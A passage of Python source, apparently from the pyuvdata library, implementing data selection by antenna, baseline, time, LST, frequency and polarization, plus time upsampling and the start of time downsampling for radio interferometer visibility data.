history_update_string += "antennas"
n_selects += 1
# Check to make sure that we actually have these antenna nums in the data
ant_check = np.logical_or(
np.isin(antenna_nums, self.ant_1_array),
np.isin(antenna_nums, self.ant_2_array),
)
if not np.all(ant_check):
raise ValueError(
"Antenna number % i is not present in the ant_1_array or "
"ant_2_array" % antenna_nums[~ant_check][0]
)
ant_blt_inds = np.where(
np.logical_and(
np.isin(self.ant_1_array, antenna_nums),
np.isin(self.ant_2_array, antenna_nums),
)
)[0]
else:
ant_blt_inds = None
if bls is not None:
if isinstance(bls, list) and all(
isinstance(bl_ind, (int, np.integer,),) for bl_ind in bls
):
for bl_ind in bls:
if not (bl_ind in self.baseline_array):
raise ValueError(
"Baseline number {i} is not present in the "
"baseline_array".format(i=bl_ind)
)
bls = list(zip(*self.baseline_to_antnums(bls)))
elif isinstance(bls, tuple) and (len(bls) == 2 or len(bls) == 3):
bls = [bls]
if len(bls) == 0 or not all(isinstance(item, tuple) for item in bls):
raise ValueError(
"bls must be a list of tuples of antenna numbers "
"(optionally with polarization) or a list of baseline numbers."
)
if not all(
[isinstance(item[0], (int, np.integer,),) for item in bls]
+ [isinstance(item[1], (int, np.integer,),) for item in bls]
):
raise ValueError(
"bls must be a list of tuples of antenna numbers "
"(optionally with polarization) or a list of baseline numbers."
)
if all(len(item) == 3 for item in bls):
if polarizations is not None:
raise ValueError(
"Cannot provide length-3 tuples and also specify polarizations."
)
if not all(isinstance(item[2], str) for item in bls):
raise ValueError(
"The third element in each bl must be a polarization string"
)
if ant_str is None:
if n_selects > 0:
history_update_string += ", baselines"
else:
history_update_string += "baselines"
else:
history_update_string += "antenna pairs"
n_selects += 1
bls_blt_inds = np.zeros(0, dtype=np.int64)
bl_pols = set()
for bl in bls:
if not (bl[0] in self.ant_1_array or bl[0] in self.ant_2_array):
raise ValueError(
"Antenna number {a} is not present in the "
"ant_1_array or ant_2_array".format(a=bl[0])
)
if not (bl[1] in self.ant_1_array or bl[1] in self.ant_2_array):
raise ValueError(
"Antenna number {a} is not present in the "
"ant_1_array or ant_2_array".format(a=bl[1])
)
wh1 = np.where(
np.logical_and(self.ant_1_array == bl[0], self.ant_2_array == bl[1])
)[0]
wh2 = np.where(
np.logical_and(self.ant_1_array == bl[1], self.ant_2_array == bl[0])
)[0]
if len(wh1) > 0:
bls_blt_inds = np.append(bls_blt_inds, list(wh1))
if len(bl) == 3:
bl_pols.add(bl[2])
elif len(wh2) > 0:
bls_blt_inds = np.append(bls_blt_inds, list(wh2))
if len(bl) == 3:
# find conjugate polarization
bl_pols.add(uvutils.conj_pol(bl[2]))
else:
raise ValueError(
"Antenna pair {p} does not have any data "
"associated with it.".format(p=bl)
)
if len(bl_pols) > 0:
polarizations = list(bl_pols)
if ant_blt_inds is not None:
# Use intersection (and) to join antenna_names/nums & ant_pairs_nums
ant_blt_inds = np.array(
list(set(ant_blt_inds).intersection(bls_blt_inds))
)
else:
ant_blt_inds = bls_blt_inds
if ant_blt_inds is not None:
if blt_inds is not None:
# Use intersection (and) to join antenna_names/nums/ant_pairs_nums
# with blt_inds
blt_inds = np.array(
list(set(blt_inds).intersection(ant_blt_inds)), dtype=np.int64
)
else:
blt_inds = ant_blt_inds
have_times = times is not None
have_time_range = time_range is not None
have_lsts = lsts is not None
have_lst_range = lst_range is not None
if (
np.count_nonzero([have_times, have_time_range, have_lsts, have_lst_range])
> 1
):
raise ValueError(
"Only one of [times, time_range, lsts, lst_range] may be "
"specified per selection operation."
)
if times is not None:
times = uvutils._get_iterable(times)
if np.array(times).ndim > 1:
times = np.array(times).flatten()
time_blt_inds = np.zeros(0, dtype=np.int64)
for jd in times:
if np.any(
np.isclose(
self.time_array,
jd,
rtol=self._time_array.tols[0],
atol=self._time_array.tols[1],
)
):
time_blt_inds = np.append(
time_blt_inds,
np.where(
np.isclose(
self.time_array,
jd,
rtol=self._time_array.tols[0],
atol=self._time_array.tols[1],
)
)[0],
)
else:
raise ValueError(
"Time {t} is not present in the time_array".format(t=jd)
)
if time_range is not None:
if np.size(time_range) != 2:
raise ValueError("time_range must be length 2.")
time_blt_inds = np.nonzero(
(self.time_array <= time_range[1]) & (self.time_array >= time_range[0])
)[0]
if time_blt_inds.size == 0:
raise ValueError(
f"No elements in time range between {time_range[0]} and "
f"{time_range[1]}."
)
if lsts is not None:
if np.any(np.asarray(lsts) > 2 * np.pi):
warnings.warn(
"The lsts parameter contained a value greater than 2*pi. "
"LST values are assumed to be in radians, not hours."
)
lsts = uvutils._get_iterable(lsts)
if np.array(lsts).ndim > 1:
lsts = np.array(lsts).flatten()
time_blt_inds = np.zeros(0, dtype=np.int64)
for lst in lsts:
if np.any(
np.isclose(
self.lst_array,
lst,
rtol=self._lst_array.tols[0],
atol=self._lst_array.tols[1],
)
):
time_blt_inds = np.append(
time_blt_inds,
np.where(
np.isclose(
self.lst_array,
lst,
rtol=self._lst_array.tols[0],
atol=self._lst_array.tols[1],
)
)[0],
)
else:
raise ValueError(f"LST {lst} is not present in the lst_array")
if lst_range is not None:
if np.size(lst_range) != 2:
raise ValueError("lst_range must be length 2.")
if np.any(np.asarray(lst_range) > 2 * np.pi):
warnings.warn(
"The lst_range contained a value greater than 2*pi. "
"LST values are assumed to be in radians, not hours."
)
if lst_range[1] < lst_range[0]:
# we're wrapping around LST = 2*pi = 0
lst_range_1 = [lst_range[0], 2 * np.pi]
lst_range_2 = [0, lst_range[1]]
time_blt_inds1 = np.nonzero(
(self.lst_array <= lst_range_1[1])
& (self.lst_array >= lst_range_1[0])
)[0]
time_blt_inds2 = np.nonzero(
(self.lst_array <= lst_range_2[1])
& (self.lst_array >= lst_range_2[0])
)[0]
time_blt_inds = np.union1d(time_blt_inds1, time_blt_inds2)
else:
time_blt_inds = np.nonzero(
(self.lst_array <= lst_range[1]) & (self.lst_array >= lst_range[0])
)[0]
if time_blt_inds.size == 0:
raise ValueError(
f"No elements in LST range between {lst_range[0]} and "
f"{lst_range[1]}."
)
if times is not None or time_range is not None:
if n_selects > 0:
history_update_string += ", times"
else:
history_update_string += "times"
n_selects += 1
if blt_inds is not None:
                # Use intersection (and) to join
# antenna_names/nums/ant_pairs_nums/blt_inds with times
blt_inds = np.array(
list(set(blt_inds).intersection(time_blt_inds)), dtype=np.int64
)
else:
blt_inds = time_blt_inds
if lsts is not None or lst_range is not None:
if n_selects > 0:
history_update_string += ", lsts"
else:
history_update_string += "lsts"
n_selects += 1
if blt_inds is not None:
                # Use intersection (and) to join
                # antenna_names/nums/ant_pairs_nums/blt_inds with lsts
blt_inds = np.array(
list(set(blt_inds).intersection(time_blt_inds)), dtype=np.int64
)
else:
blt_inds = time_blt_inds
if blt_inds is not None:
if len(blt_inds) == 0:
raise ValueError("No baseline-times were found that match criteria")
if max(blt_inds) >= self.Nblts:
raise ValueError("blt_inds contains indices that are too large")
if min(blt_inds) < 0:
raise ValueError("blt_inds contains indices that are negative")
blt_inds = sorted(set(blt_inds))
if freq_chans is not None:
freq_chans = uvutils._get_iterable(freq_chans)
if np.array(freq_chans).ndim > 1:
freq_chans = np.array(freq_chans).flatten()
if frequencies is None:
if self.future_array_shapes:
frequencies = self.freq_array[freq_chans]
else:
frequencies = self.freq_array[0, freq_chans]
else:
frequencies = uvutils._get_iterable(frequencies)
if self.future_array_shapes:
frequencies = np.sort(
list(set(frequencies) | set(self.freq_array[freq_chans]))
)
else:
frequencies = np.sort(
list(set(frequencies) | set(self.freq_array[0, freq_chans]))
)
if frequencies is not None:
frequencies = uvutils._get_iterable(frequencies)
if np.array(frequencies).ndim > 1:
frequencies = np.array(frequencies).flatten()
if n_selects > 0:
history_update_string += ", frequencies"
else:
history_update_string += "frequencies"
n_selects += 1
if self.future_array_shapes:
freq_arr_use = self.freq_array
else:
freq_arr_use = self.freq_array[0, :]
# Check and see that all requested freqs are available
freq_check = np.isin(frequencies, freq_arr_use)
if not np.all(freq_check):
raise ValueError(
"Frequency %g is not present in the freq_array"
% frequencies[np.where(~freq_check)[0][0]]
)
freq_inds = np.where(np.isin(freq_arr_use, frequencies))[0]
if len(frequencies) > 1:
freq_ind_separation = freq_inds[1:] - freq_inds[:-1]
if self.flex_spw:
freq_ind_separation = freq_ind_separation[
np.diff(self.flex_spw_id_array[freq_inds]) == 0
]
if np.min(freq_ind_separation) < np.max(freq_ind_separation):
warnings.warn(
"Selected frequencies are not evenly spaced. This "
"will make it impossible to write this data out to "
"some file types"
)
elif np.max(freq_ind_separation) > 1:
warnings.warn(
"Selected frequencies are not contiguous. This "
"will make it impossible to write this data out to "
"some file types."
)
freq_inds = sorted(set(freq_inds))
else:
freq_inds = None
if polarizations is not None:
polarizations = uvutils._get_iterable(polarizations)
if np.array(polarizations).ndim > 1:
polarizations = np.array(polarizations).flatten()
if n_selects > 0:
history_update_string += ", polarizations"
else:
history_update_string += "polarizations"
n_selects += 1
pol_inds = np.zeros(0, dtype=np.int64)
for p in polarizations:
if isinstance(p, str):
p_num = uvutils.polstr2num(p, x_orientation=self.x_orientation)
else:
p_num = p
if p_num in self.polarization_array:
pol_inds = np.append(
pol_inds, np.where(self.polarization_array == p_num)[0]
)
else:
raise ValueError(
"Polarization {p} is not present in the "
"polarization_array".format(p=p)
)
if len(pol_inds) > 2:
pol_ind_separation = pol_inds[1:] - pol_inds[:-1]
if np.min(pol_ind_separation) < np.max(pol_ind_separation):
warnings.warn(
"Selected polarization values are not evenly spaced. This "
"will make it impossible to write this data out to "
"some file types"
)
pol_inds = sorted(set(pol_inds))
else:
pol_inds = None
history_update_string += " using pyuvdata."
return blt_inds, freq_inds, pol_inds, history_update_string
def _select_metadata(
self,
blt_inds,
freq_inds,
pol_inds,
history_update_string,
keep_all_metadata=True,
):
"""
Perform select on everything except the data-sized arrays.
Parameters
----------
blt_inds : list of int
list of baseline-time indices to keep. Can be None (to keep everything).
freq_inds : list of int
list of frequency indices to keep. Can be None (to keep everything).
pol_inds : list of int
list of polarization indices to keep. Can be None (to keep everything).
history_update_string : str
string to append to the end of the history.
keep_all_metadata : bool
Option to keep metadata for antennas that are no longer in the dataset.
"""
if blt_inds is not None:
self.Nblts = len(blt_inds)
self.baseline_array = self.baseline_array[blt_inds]
self.Nbls = len(np.unique(self.baseline_array))
self.time_array = self.time_array[blt_inds]
self.integration_time = self.integration_time[blt_inds]
self.lst_array = self.lst_array[blt_inds]
self.uvw_array = self.uvw_array[blt_inds, :]
self.ant_1_array = self.ant_1_array[blt_inds]
self.ant_2_array = self.ant_2_array[blt_inds]
self.Nants_data = self._calc_nants_data()
if self.phase_center_app_ra is not None:
self.phase_center_app_ra = self.phase_center_app_ra[blt_inds]
if self.phase_center_app_dec is not None:
self.phase_center_app_dec = self.phase_center_app_dec[blt_inds]
if self.phase_center_frame_pa is not None:
self.phase_center_frame_pa = self.phase_center_frame_pa[blt_inds]
if self.multi_phase_center:
self.phase_center_id_array = self.phase_center_id_array[blt_inds]
self.Ntimes = len(np.unique(self.time_array))
if not keep_all_metadata:
ants_to_keep = set(np.unique(self.ant_1_array)).union(
np.unique(self.ant_2_array)
)
inds_to_keep = [
self.antenna_numbers.tolist().index(ant) for ant in ants_to_keep
]
self.antenna_names = [self.antenna_names[ind] for ind in inds_to_keep]
self.antenna_numbers = self.antenna_numbers[inds_to_keep]
self.antenna_positions = self.antenna_positions[inds_to_keep, :]
if self.antenna_diameters is not None:
self.antenna_diameters = self.antenna_diameters[inds_to_keep]
self.Nants_telescope = int(len(ants_to_keep))
if freq_inds is not None:
self.Nfreqs = len(freq_inds)
if self.future_array_shapes:
self.freq_array = self.freq_array[freq_inds]
else:
self.freq_array = self.freq_array[:, freq_inds]
if self.flex_spw or self.future_array_shapes:
self.channel_width = self.channel_width[freq_inds]
if self.flex_spw:
self.flex_spw_id_array = self.flex_spw_id_array[freq_inds]
# Use the spw ID array to check and see which SPWs are left
self.spw_array = self.spw_array[
np.isin(self.spw_array, self.flex_spw_id_array)
]
self.Nspws = len(self.spw_array)
if pol_inds is not None:
self.Npols = len(pol_inds)
self.polarization_array = self.polarization_array[pol_inds]
self.history = self.history + history_update_string
def select(
self,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
time_range=None,
lsts=None,
lst_range=None,
polarizations=None,
blt_inds=None,
inplace=True,
keep_all_metadata=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Downselect data to keep on the object along various axes.
Axes that can be selected along include antenna names or numbers,
antenna pairs, frequencies, times and polarizations. Specific
baseline-time indices can also be selected, but this is not commonly
used.
The history attribute on the object will be updated to identify the
operations performed.
Parameters
----------
antenna_nums : array_like of int, optional
            The antenna numbers to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
            The antenna names to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
        bls : list of tuple or list of int, optional
            A list of antenna number tuples (e.g. [(0, 1), (3, 2)]), a list of
            baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]), or a list of
            baseline numbers (e.g. [67599, 71699, 73743]) specifying baselines
            to keep in the object. For length-2 tuples, the ordering of the numbers
            within the tuple does not matter. For length-3 tuples, the polarization
            string is in the order of the two antennas. If length-3 tuples are
            provided, `polarizations` must be None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to keep in the object. Can be 'auto', 'cross', 'all',
or combinations of antenna numbers and polarizations (e.g. '1',
'1_2', '1x_2y'). See tutorial for more examples of valid strings and
the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
            An ant_str cannot be passed in addition to any of the `antenna_nums`,
            `antenna_names`, `bls`, or `polarizations` parameters; if it is, a
            ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to keep in the object, each value passed here should
exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to keep in the object.
times : array_like of float, optional
The times to keep in the object, each value passed here should
            exist in the time_array. Cannot be used with `time_range`, `lsts`,
            or `lst_range`.
time_range : array_like of float, optional
The time range in Julian Date to keep in the object, must be
length 2. Some of the times in the object should fall between the
            first and last elements. Cannot be used with `times`, `lsts`, or
            `lst_range`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int or str, optional
            The polarization numbers to keep in the object, each value passed
here should exist in the polarization_array. If passing strings, the
canonical polarization strings (e.g. "xx", "rr") are supported and if the
`x_orientation` attribute is set, the physical dipole strings
(e.g. "nn", "ee") are also supported.
blt_inds : array_like of int, optional
The baseline-time indices to keep in the object. This is
not commonly used.
inplace : bool
Option to perform the select directly on self or return a new UVData
object with just the selected data (the default is True, meaning the
select will be done on self).
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
            that do not have data associated with them after the select operation.
run_check : bool
Option to check for the existence and proper shapes of parameters
after downselecting data on this object (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
downselecting data on this object (the default is True, meaning the
acceptable range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Returns
-------
UVData object or None
None is returned if inplace is True, otherwise a new UVData object
with just the selected data is returned
Raises
------
ValueError
If any of the parameters are set to inappropriate values.
"""
if inplace:
uv_object = self
else:
uv_object = self.copy()
(
blt_inds,
freq_inds,
pol_inds,
history_update_string,
) = uv_object._select_preprocess(
antenna_nums,
antenna_names,
ant_str,
bls,
frequencies,
freq_chans,
times,
time_range,
lsts,
lst_range,
polarizations,
blt_inds,
)
# do select operations on everything except data_array, flag_array
# and nsample_array
uv_object._select_metadata(
blt_inds, freq_inds, pol_inds, history_update_string, keep_all_metadata
)
if self.metadata_only:
if not inplace:
return uv_object
else:
return
if blt_inds is not None:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[blt_inds])
if freq_inds is not None:
if self.future_array_shapes:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, freq_inds, :])
else:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, :, freq_inds, :])
if pol_inds is not None:
if self.future_array_shapes:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, :, pol_inds])
else:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, :, :, pol_inds])
        # check that the resulting object is self-consistent
if run_check:
uv_object.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return uv_object
def _harmonize_resample_arrays(
self,
inds_to_keep,
temp_baseline,
temp_time,
temp_int_time,
temp_data,
temp_flag,
temp_nsample,
):
"""
Make a self-consistent object after up/downsampling.
This function is called by both upsample_in_time and downsample_in_time.
See those functions for more information about arguments.
"""
self.baseline_array = self.baseline_array[inds_to_keep]
self.time_array = self.time_array[inds_to_keep]
self.integration_time = self.integration_time[inds_to_keep]
self.baseline_array = np.concatenate((self.baseline_array, temp_baseline))
self.time_array = np.concatenate((self.time_array, temp_time))
self.integration_time = np.concatenate((self.integration_time, temp_int_time))
if not self.metadata_only:
self.data_array = self.data_array[inds_to_keep]
self.flag_array = self.flag_array[inds_to_keep]
self.nsample_array = self.nsample_array[inds_to_keep]
# concatenate temp array with existing arrays
self.data_array = np.concatenate((self.data_array, temp_data), axis=0)
self.flag_array = np.concatenate((self.flag_array, temp_flag), axis=0)
self.nsample_array = np.concatenate(
(self.nsample_array, temp_nsample), axis=0
)
# set antenna arrays from baseline_array
self.ant_1_array, self.ant_2_array = self.baseline_to_antnums(
self.baseline_array
)
# update metadata
self.Nblts = self.baseline_array.shape[0]
self.Ntimes = np.unique(self.time_array).size
self.uvw_array = np.zeros((self.Nblts, 3))
# update app source coords to new times
self._set_app_coords_helper()
# set lst array
self.set_lsts_from_time_array()
# temporarily store the metadata only to calculate UVWs correctly
uv_temp = self.copy(metadata_only=True)
# properly calculate the UVWs self-consistently
uv_temp.set_uvws_from_antenna_positions(allow_phasing=True)
self.uvw_array = uv_temp.uvw_array
return
def upsample_in_time(
self,
max_int_time,
blt_order="time",
minor_order="baseline",
summing_correlator_mode=False,
allow_drift=False,
):
"""
Resample to a shorter integration time.
This method will resample a UVData object such that all data samples have
an integration time less than or equal to the `max_int_time`. The new
samples are copied from the original samples (not interpolated).
Parameters
----------
max_int_time : float
Maximum integration time to upsample to in seconds.
blt_order : str
Major baseline ordering for output object. Default is "time". See
the documentation on the `reorder_blts` method for more info.
minor_order : str
Minor baseline ordering for output object. Default is "baseline".
summing_correlator_mode : bool
Option to split the flux from the original samples into the new
samples rather than duplicating the original samples in all the new
samples (undoing an integration rather than an average) to emulate
undoing the behavior in some correlators (e.g. HERA).
allow_drift : bool
Option to allow resampling of drift mode data. If this is False,
drift mode data will be phased before resampling and then unphased
after resampling. Phasing and unphasing can introduce small errors,
but resampling in drift mode may result in unexpected behavior.
Returns
-------
None
"""
# check that max_int_time is sensible given integration_time
min_integration_time = np.amin(self.integration_time)
sensible_min = 1e-2 * min_integration_time
if max_int_time < sensible_min:
raise ValueError(
"Decreasing the integration time by more than a "
"factor of 100 is not supported. Also note that "
"max_int_time should be in seconds."
)
# figure out where integration_time is longer than max_int_time
inds_to_upsample = np.nonzero(
(self.integration_time > max_int_time)
& (
~np.isclose(
self.integration_time,
max_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
)
)
if len(inds_to_upsample[0]) == 0:
warnings.warn(
"All values in the integration_time array are already "
"longer than the value specified; doing nothing."
)
return
input_phase_type = self.phase_type
if input_phase_type == "drift":
if allow_drift:
print(
"Data are in drift mode and allow_drift is True, so "
"resampling will be done without phasing."
)
else:
# phase to RA/dec of zenith
print("Data are in drift mode, phasing before resampling.")
phase_time = Time(self.time_array[0], format="jd")
self.phase_to_time(phase_time)
# we want the ceil of this, but we don't want to get the wrong answer
# when the number is very close to an integer but just barely above it.
temp_new_samples = self.integration_time[inds_to_upsample] / max_int_time
mask_close_floor = np.isclose(temp_new_samples, np.floor(temp_new_samples))
temp_new_samples[mask_close_floor] = np.floor(
temp_new_samples[mask_close_floor]
)
n_new_samples = np.asarray(list(map(int, np.ceil(temp_new_samples))))
temp_Nblts = np.sum(n_new_samples)
temp_baseline = np.zeros((temp_Nblts,), dtype=np.int64)
temp_time = np.zeros((temp_Nblts,))
temp_int_time = np.zeros((temp_Nblts,))
if self.metadata_only:
temp_data = None
temp_flag = None
temp_nsample = None
else:
if self.future_array_shapes:
temp_data = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
else:
temp_data = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
i0 = 0
for i, ind in enumerate(inds_to_upsample[0]):
i1 = i0 + n_new_samples[i]
temp_baseline[i0:i1] = self.baseline_array[ind]
if not self.metadata_only:
if summing_correlator_mode:
temp_data[i0:i1] = self.data_array[ind] / n_new_samples[i]
else:
temp_data[i0:i1] = self.data_array[ind]
temp_flag[i0:i1] = self.flag_array[ind]
temp_nsample[i0:i1] = self.nsample_array[ind]
# compute the new times of the upsampled array
t0 = self.time_array[ind]
dt = self.integration_time[ind] / n_new_samples[i]
# `offset` will be 0.5 or 1, depending on whether n_new_samples for
# this baseline is even or odd.
offset = 0.5 + 0.5 * (n_new_samples[i] % 2)
n2 = n_new_samples[i] // 2
# Figure out the new center for sample ii taking offset into
# account. Because `t0` is the central time for the original time
# sample, `nt` will range from negative to positive so that
# `temp_time` will result in the central time for the new samples.
            # `idx2` tells us how far to shift and in what direction for each
# new sample.
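            # Worked example (hypothetical): if n_new_samples[i] is 3 then
            # offset = 1, n2 = 1 and idx2 takes the values -1, 0, 1; if
            # n_new_samples[i] is 2 then idx2 takes the values -0.5, 0.5. In
            # both cases the new sample times are symmetric about t0.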
for ii, idx in enumerate(range(i0, i1)):
idx2 = ii + offset + n2 - n_new_samples[i]
nt = ((t0 * units.day) + (dt * idx2 * units.s)).to(units.day).value
temp_time[idx] = nt
temp_int_time[i0:i1] = dt
i0 = i1
# harmonize temporary arrays with existing ones
inds_to_keep = np.nonzero(self.integration_time <= max_int_time)
self._harmonize_resample_arrays(
inds_to_keep,
temp_baseline,
temp_time,
temp_int_time,
temp_data,
temp_flag,
temp_nsample,
)
if input_phase_type == "drift" and not allow_drift:
print("Unphasing back to drift mode.")
self.unphase_to_drift()
# reorganize along blt axis
self.reorder_blts(order=blt_order, minor_order=minor_order)
# check the resulting object
self.check()
# add to the history
history_update_string = (
" Upsampled data to {:f} second integration time "
"using pyuvdata.".format(max_int_time)
)
self.history = self.history + history_update_string
return
def downsample_in_time(
self,
min_int_time=None,
n_times_to_avg=None,
blt_order="time",
minor_order="baseline",
keep_ragged=True,
summing_correlator_mode=False,
allow_drift=False,
):
"""
Average to a longer integration time.
This method will average a UVData object either by an integer factor
(by setting `n_times_to_avg`) or by a factor that can differ by
baseline-time sample such that after averaging, the samples have an
integration time greater than or equal to the `min_int_time` (up to the
tolerance on the integration_time).
Note that if the integrations for a baseline do not divide evenly by the
`n_times_to_avg` or into the specified `min_int_time`, the final
integrations for that baseline may have integration times less than
`min_int_time` or be composed of fewer input integrations than `n_times_to_avg`.
This behavior can be controlled with the `keep_ragged` argument.
The new samples are averages of the original samples (not interpolations).
Parameters
----------
min_int_time : float
Minimum integration time to average the UVData integration_time to
in seconds.
n_times_to_avg : int
Number of time integrations to average together.
blt_order : str
Major baseline ordering for output object. Default is "time". See the
documentation on the `reorder_blts` method for more details.
minor_order : str
Minor baseline ordering for output object. Default is "baseline".
keep_ragged : bool
When averaging baselines that do not evenly divide into min_int_time,
or that have a number of integrations that do not evenly divide by
n_times_to_avg, keep_ragged controls whether to keep the (averaged)
integrations corresponding to the remaining samples (keep_ragged=True),
or discard them (keep_ragged=False).
summing_correlator_mode : bool
Option to integrate the flux from the original samples rather than
average the flux to emulate the behavior in some correlators (e.g. HERA).
allow_drift : bool
Option to allow averaging of drift mode data. If this is False,
drift mode data will be phased before resampling and then unphased
after resampling. Phasing and unphasing can introduce small errors,
but averaging in drift mode may result in more decoherence.
Returns
-------
None
"""
if min_int_time is None and n_times_to_avg is None:
raise ValueError("Either min_int_time or n_times_to_avg must be set.")
if min_int_time is not None and n_times_to_avg is not None:
raise ValueError("Only one of min_int_time or n_times_to_avg can be set.")
if self.Ntimes == 1:
raise ValueError("Only one time in this object, cannot downsample.")
if min_int_time is not None:
# check that min_int_time is sensible given integration_time
max_integration_time = np.amax(self.integration_time)
sensible_max = 1e2 * max_integration_time
if min_int_time > sensible_max:
raise ValueError(
"Increasing the integration time by more than a "
"factor of 100 is not supported. Also note that "
"min_int_time should be in seconds."
)
# first figure out where integration_time is shorter than min_int_time
inds_to_downsample = np.nonzero(
(self.integration_time < min_int_time)
& (
~np.isclose(
self.integration_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
)
)
if len(inds_to_downsample[0]) == 0:
warnings.warn(
"All values in the integration_time array are already "
"longer than the value specified; doing nothing."
)
return
else:
if not isinstance(n_times_to_avg, (int, np.integer)):
raise ValueError("n_times_to_avg must be an integer.")
# If we're going to do actual work, reorder the baselines to ensure time is
# monotonically increasing.
# Default of reorder_blts is baseline major, time minor, which is what we want.
self.reorder_blts()
if min_int_time is not None:
# now re-compute inds_to_downsample, in case things have changed
inds_to_downsample = np.nonzero(
(self.integration_time < min_int_time)
& ~np.isclose(
self.integration_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
)
bls_to_downsample = np.unique(self.baseline_array[inds_to_downsample])
else:
bls_to_downsample = np.unique(self.baseline_array)
# figure out how many baseline times we'll end up with at the end
n_new_samples = 0
for bl in bls_to_downsample:
bl_inds = np.nonzero(self.baseline_array == bl)[0]
int_times = self.integration_time[bl_inds]
if min_int_time is not None:
running_int_time = 0.0
for itime, int_time in enumerate(int_times):
running_int_time += int_time
over_min_int_time = running_int_time > min_int_time or np.isclose(
running_int_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
last_sample = itime == len(bl_inds) - 1
# We sum up all the samples found so far if we're over the
# target minimum time, or we've hit the end of the time
# samples for this baseline.
if over_min_int_time or last_sample:
if last_sample and not (over_min_int_time or keep_ragged):
# don't do anything -- implicitly drop these integrations
continue
n_new_samples += 1
running_int_time = 0.0
else:
n_bl_times = self.time_array[bl_inds].size
nsample_temp = np.sum(n_bl_times / n_times_to_avg)
if keep_ragged and not np.isclose(nsample_temp, np.floor(nsample_temp)):
n_new_samples += np.ceil(nsample_temp).astype(int)
else:
n_new_samples += np.floor(nsample_temp).astype(int)
# figure out if there are any time gaps in the data
# meaning that the time differences are larger than the integration times
# time_array is in JD, need to convert to seconds for the diff
dtime = np.ediff1d(self.time_array[bl_inds]) * 24 * 3600
if len(np.unique(int_times)) == 1:
# this baseline has all the same integration times
if len(np.unique(dtime)) > 1 and not np.isclose(
np.max(dtime),
np.min(dtime),
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
):
warnings.warn(
"There is a gap in the times of baseline {bl}. "
"The output may include averages across long "
"time gaps.".format(bl=self.baseline_to_antnums(bl))
)
elif not np.isclose(
dtime[0],
int_times[0],
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
):
warnings.warn(
"The time difference between integrations is "
"not the same as the integration time for "
"baseline {bl}. The output may average across "
"longer time intervals than "
"expected".format(bl=self.baseline_to_antnums(bl))
)
else:
# varying integration times for this baseline, need to be more careful
expected_dtimes = (int_times[:-1] + int_times[1:]) / 2
wh_diff = np.nonzero(~np.isclose(dtime, expected_dtimes))
if wh_diff[0].size > 1:
warnings.warn(
"The time difference between integrations is "
"different than the expected given the "
"integration times for baseline {bl}. The "
"output may include averages across long time "
"gaps.".format(bl=self.baseline_to_antnums(bl))
)
temp_Nblts = n_new_samples
input_phase_type = self.phase_type
if input_phase_type == "drift":
if allow_drift:
print(
"Data are in drift mode and allow_drift is True, so "
"resampling will be done without phasing."
)
else:
# phase to RA/dec of zenith
print("Data are in drift mode, phasing before resampling.")
phase_time = Time(self.time_array[0], format="jd")
self.phase_to_time(phase_time)
# make temporary arrays
temp_baseline = np.zeros((temp_Nblts,), dtype=np.int64)
temp_time = np.zeros((temp_Nblts,))
temp_int_time = np.zeros((temp_Nblts,))
if self.metadata_only:
temp_data = None
temp_flag = None
temp_nsample = None
else:
if self.future_array_shapes:
temp_data = np.zeros(
